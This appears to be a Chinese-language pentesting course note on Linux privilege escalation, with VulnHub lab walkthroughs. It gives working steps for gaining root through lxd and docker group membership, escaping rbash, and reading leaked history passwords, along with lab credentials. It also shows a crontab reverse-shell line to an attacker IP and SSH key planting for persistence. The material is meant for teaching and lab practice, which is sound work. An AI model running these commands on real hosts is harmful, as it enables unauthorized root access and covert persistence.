知识点

1、普通用户到Linux-泄漏-History
2、普通用户到Linux-限制-Rbash绕过
3、普通用户到Linux-容器-LXD&Docker
4.Linux系统提权-web/普通用户-docker逃逸&提权&shell交互

章节点：
1、Web权限提升及转移
2、系统权限提升及转移
3、宿主权限提升及转移
4、域控权限提升及转移

基础点

0、为什么我们要学习权限提升转移技术：

简单来说就是达到目的过程中需要用到它

1、具体有哪些权限需要我们了解掌握的：

后台权限
数据库权限
Web权限
计算机用户权限
计算机系统权限
宿主机权限
域控制器权限

2、以上常见权限获取方法简要归类说明：

后台权限：SQL注入，数据库泄漏，弱口令攻击，未授权访问等造成
数据库权限：SQL注入，数据库泄漏，弱口令攻击，未授权访问等造成
Web权限：RCE,反序列化,文件上传等直达或通过后台数据库间接造成
计算机用户权限：弱口令,数据泄漏等直达或通过Web，服务器及域控转移造成
计算机系统权限：系统内核漏洞,钓鱼后门攻击,主机软件安全直达或上述权限提升造成
宿主机权限：Docker不安全配置或漏洞权限提升直达（服务资产造成入口后提升）
域控制器权限：内网域计算机用户提升或自身内核漏洞，后门攻击，主机软件安全直达

3、以上常见权限获取后能操作的具体事情：

后台权限：文章管理，站点管理，模版管理，数据管理，上传管理等
数据库权限：操作数据库的权限，数据增删改查等（以数据库用户为主）
Web权限：源码查看，源码文件增删改查，磁盘文件文件夹查看(以权限配置为主)
计算机用户权限：就如同自己电脑上普通用户能操作的情况（敏感操作会被禁止）
计算机系统权限：就如同自己电脑上能操作的情况（整个系统都是你的）
宿主机权限：就如同自己电脑上能操作的情况（整个系统都是你的）
域控制器权限：就如同自己电脑上能操作的情况（整个内网域系统都是你的）

4、以上常见权限在实战中的应用场景介绍：

当我们通过弱口令进入到应用后台管理
当我们下载备份文件获取到数据库信息
当我们通过漏洞拿到资产系统的Web权限
当我们在公司被给予账号密码登录计算机或系统
当我们在公司或钓鱼后门获取到某个公司机器系统
.....................................

Linux提权

1、内核溢出提权
2、suid、sudo、nfs、path、ld_preload、cron、lxd、capability、rbash等
3、数据库类型提权

Linux：

系统用户：UID(0-999)
普通用户：UID(1000-*)
root用户：UID为0，拥有系统的完全控制权限

综合检测脚本

https://github.com/carlospolop/PEASS-ng
https://github.com/diego-treitos/linux-smart-enumeration
https://github.com/redcode-labs/Bashark
https://github.com/rebootuser/LinEnum

应用场景
获取到Web权限或普通用户在Linux服务器上时进行的权限提升

SUID (Set owner User ID up on execution)是给予文件的一个特殊类型的文件权限。在Linux/Unix中，当一个程序运行的时候，程序将从登录用户处继承权限。SUID被定义为给予一个用户临时的（程序/文件）所有者的权限来运行一个程序/文件。用户在执行程序/文件/命令的时候，将获取文件所有者的权限以及所有者的UID和GID。

SUDO权限是root把本来只能超级用户执行的命令赋予普通用户执行，系统管理员集中的管理用户使用权限和使用主机，配置文件：/etc/sudoers，除此配置之外的问题，SUDO还有两个CVE漏洞（CVE-2019-14287 CVE-2021-3156）。

LXD、LXC 和 Docker 是三种不同的容器化技术，它们在实现和使用上有一些区别。
总结来说，LXD是基于LXC的系统级容器管理器，提供了更高级别的接口和管理工具；LXC是Linux内核提供的一种虚拟化技术，允许在单个Linux内核上运行多个隔离的用户空间实例；而Docker是基于LXC的容器化平台，提供了一套简化容器构建、分发和运行的工具和API。

LXD（Linux容器守护程序）是一个系统级容器管理器，它基于LXC（Linux容器）技术。LXD提供了更高级别的接口和管理工具，使得轻松创建和管理系统容器成为可能。LXD主要面向系统级容器，可以运行完整的操作系统镜像，并提供类似于虚拟机的环境。它提供了更好的隔离性、资源控制和安全性。

LXC（Linux容器）是Linux内核提供的一种虚拟化技术，它允许在单个Linux内核上运行多个隔离的用户空间实例。LXC提供了一组工具和API，用于创建和管理容器。LXC容器通常比LXD容器更加灵活和轻量级，可以定制底层操作系统的各个方面。LXC更适合于需要更细粒度控制的使用场景。

Docker是一个开源的容器化平台，它建立在LXC之上，并提供了一套更高级别的工具和API，使得容器的构建、分发和运行变得更加简单。Docker提供了一个容器镜像的集装箱模型，使得容器可以在不同的环境中进行移植和部署。Docker强调容器的可移植性和易用性，适用于开发、测试和部署应用程序的场景。

一、演示案例-Linux系统提权-普通用户-LXD容器

原理

LXD是基于LXC容器的管理程序，当前用户可操作容器，
理解为用户创建一个容器，再用容器挂载宿主机磁盘，
最后使用容器权限操作宿主机磁盘内容达到提权效果。

lxd本地提权条件

-已经获得普通用户Shell
-用户属于lxd组

复现环境：https://www.vulnhub.com/entry/ai-web-2,357/

1、入口点

普通用户
User: n0nr00tuser
Pass: zxowieoi4sdsadpEClDws1sf

2、脚本检测及利用

./LinEnum.sh

3、创建镜像容器，挂载磁盘，进入镜像容器，进入目录提权

容器镜像：https://github.com/saghul/lxd-alpine-builder

lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias test //导入这个镜像命名为test容器
lxc init test test -c security.privileged=true //初始化这个镜像

lxc config device add test test disk source=/ path=/mnt/root recursive=true  //挂载镜像磁盘，镜像的/mnt/root目录就是真实下的/目录。

lxc start test //启动这个test容器
lxc exec test /bin/sh  //获取这个test容器shell
cd /mnt/root/root //进入目录提权
cat flag.txt

二、演示案例-Linux系统提权-普通用户-Docker容器

跟docker逃逸不同的是docker提权是拿到一个真实服务器上的普通用户后利用服务器上的docker进行权限提升，docker逃逸是逃逸，docker提权是提权，两回事。

Docker本地提权条件

1、已经获得普通用户Shell
2、用户属于docker组

本地实验

把一个普通账号dockertest添加到docker组,使用newgrp更新docker组
usermod -G docker dockertest
newgrp docker
su dockertest

docker run -v /:/mnt -it alpine //利用docker起一个镜像并把真机的/目录挂载到镜像的/mnt目录。

vulnhub

复现环境：https://www.vulnhub.com/entry/chill-hack-1,622/

1、入口点

普通用户
User: anurodh
Pass: !d0ntKn0wmYp@ssw0rd

2、检测及利用

手工查询

脚本检测

./LinEnum.sh

3、创建容器，挂载磁盘，进入容器，进入目录提权

docker run -v /:/mnt -it alpine
cd /mnt/root

三、演示案例-Linux系统提权绕过-普通用户-Rbash绕过

Rbash(The Restricted mode of bash),也就是限制型bash(有些命令执行不了）
在渗透测试中可能遇到rbash，尝试绕过后才能进行后续操作
adduser rbashtest  //创建rbashtest用户
passwd rbashtest //设置rbashtest密码，不设置这用户用不了
usermod -s /bin/rbash rbashtest  //将rbashtest用户添加到rbash组

复现环境：https://www.vulnhub.com/entry/funbox-rookie,520/

1、入口点

fscan -h 192.168.1.0/24

ftp 192.168.1.8

get tom.zip(解压密码iubire)

ssh tom@192.168.1.8 -i id_rsa

2、Rbash绕过

python -m http.server 8080

wget http://192.168.1.3:8080/LinEnum.sh

如何绕过rbash限制？

参考：https://xz.aliyun.com/t/7642
awk 'BEGIN {system("/bin/bash")}'
./LinEnum.sh

3、历史泄漏提权

history //查看执行的历史命令，里面有可能会泄露一些敏感信息。
cat /home/tom/.mysql_history //泄露root密码

su root(xx11yy22!)  

四、演示案例-Linux系统提权-web/普通用户-docker逃逸&提权&shell交互

https://github.com/cdk-team/CDK

写到宿主机计划任务反弹shell

echo -e "* * * * * root bash -i >& /dev/tcp/192.168.139.128/4444 0>&1\n" >> /mnt/etc/crontab

写到宿主机计划任务反弹shell

1.ssh-keygen -t rsa //执行生成key命令

id_rsa  #私钥
id_rsa.pub  #公钥

2.将id_rsa.pub公钥上传到公网服务器中，目标上使用wget下载这个公钥下载到本地

将公钥写入到宿主机authorized_keys文件中
mkdir /mnt/root/.ssh && touch /mnt/root/.ssh/authorized_keys
cat id_rsa.pub >> /root/.ssh/authorized_keys && chmod 600 /root/.ssh/authorized_keys && chmod 700 /root/.ssh/

3.ssh秘钥登录

自己的攻击机器上执行
cd /root/.ssh/
ssh -i id_rsa root@目标IP
或者ssh直接连也行